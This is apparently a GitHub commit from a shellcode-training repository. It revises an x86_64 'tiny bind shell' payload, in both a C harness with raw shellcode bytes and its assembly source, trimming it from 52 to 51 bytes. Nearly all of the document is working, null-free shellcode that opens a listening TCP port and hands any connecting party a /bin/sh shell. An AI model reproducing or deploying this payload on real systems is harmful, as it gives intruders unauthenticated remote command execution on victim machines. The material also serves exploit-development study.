shorter and shorter

Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
geyslan · Apr 3, 2021 · a2775f2 · a2775f2
1 parent e12bbf4
commit a2775f2
Show file tree

Hide file tree

Showing 2 changed files with 15 additions and 15 deletions.
diff --git a/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c b/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c
@@ -28,7 +28,7 @@
      assembly source:
    https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
 
-   * 52 bytes
+   * 51 bytes
    * null-free
 
 
@@ -54,11 +54,11 @@ int main(void)
 	const char code[] =
 
 		"\x6a\x29\x58\x99\x6a\x01\x5e\x6a\x02\x5f"
-		"\x0f\x05\x52\x5e\x97\xb0\x32\x0f\x05\xb0"
-		"\x2b\x0f\x05\x97\x96\xff\xce\x6a\x21\x58"
-		"\x0f\x05\x75\xf7\x52\x48\xbf\x2f\x2f\x62"
-		"\x69\x6e\x2f\x73\x68\x57\x54\x5f\xb0\x3b"
-		"\x0f\x05";
+		"\x0f\x05\x97\xb0\x32\x0f\x05\x96\xb0\x2b"
+		"\x0f\x05\x97\x96\xff\xce\x6a\x21\x58\x0f"
+		"\x05\x75\xf7\x52\x48\xbf\x2f\x2f\x62\x69"
+		"\x6e\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x0f"
+		"\x05";
 
 	// When contains null bytes, printf will show a wrong shellcode length.
 	printf("Shellcode Length:  %ld\n", strlen(code));

diff --git a/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm b/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
@@ -37,7 +37,7 @@
 
 ;   tiny_shell_bind_tcp_random_port_x86_64
 ;
-;   * 52 bytes
+;   * 51 bytes
 ;   * null-free
 ;
 ;
@@ -90,11 +90,9 @@ _start:
 
 	; Preparing to listen the incoming connection (passive socket)
 	; int listen(int sockfd, int backlog);
-	; listen(sockfd, int);
+	; listen(sockfd, 1);
 
-	; listen arguments
-	push rdx		; put zero into rsi
-	pop rsi
+	; listen arguments	; just let rsi (backlog) as 1 - man(2) listen
 	
 	xchg eax, edi		; put the file descriptor returned by socket() into rdi
 
@@ -106,8 +104,9 @@ _start:
 	; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
 	; accept(sockfd, NULL, NULL)
 
-	; accept arguments	; here we need only do nothing, the rdi already contains the sockfd,
-				; likewise rsi and rdx contains 0
+	; accept arguments	; rdi already contains the sockfd, likewise rdx contains 0
+
+	xchg eax, esi		; put listen() return (0) into rsi
 
 	mov al, 43		; syscall 43 - accept
 	syscall			; kernel interruption
@@ -132,16 +131,17 @@ dup_loop:
 
 	; Finally, using execve to substitute the actual process with /bin/sh
 	; int execve(const char *filename, char *const argv[], char *const envp[]);
-	; exevcve("/bin/sh", NULL, NULL)
+	; exevcve("//bin/sh", NULL, NULL)
 
 	; execve string argument
 					; *envp[] rdx is already NULL
 					; *argv[] rsi is already NULL
 	push rdx			; put NULL terminating string
 	mov rdi, 0x68732f6e69622f2f	; "//bin/sh"
-	push rdi			; push /bin/sh string
+	push rdi			; push //bin/sh string
 	push rsp			; push the stack pointer
 	pop rdi				; pop it (string address) into rdi
 
 	mov al, 59			; execve syscall
 	syscall				; bingo
+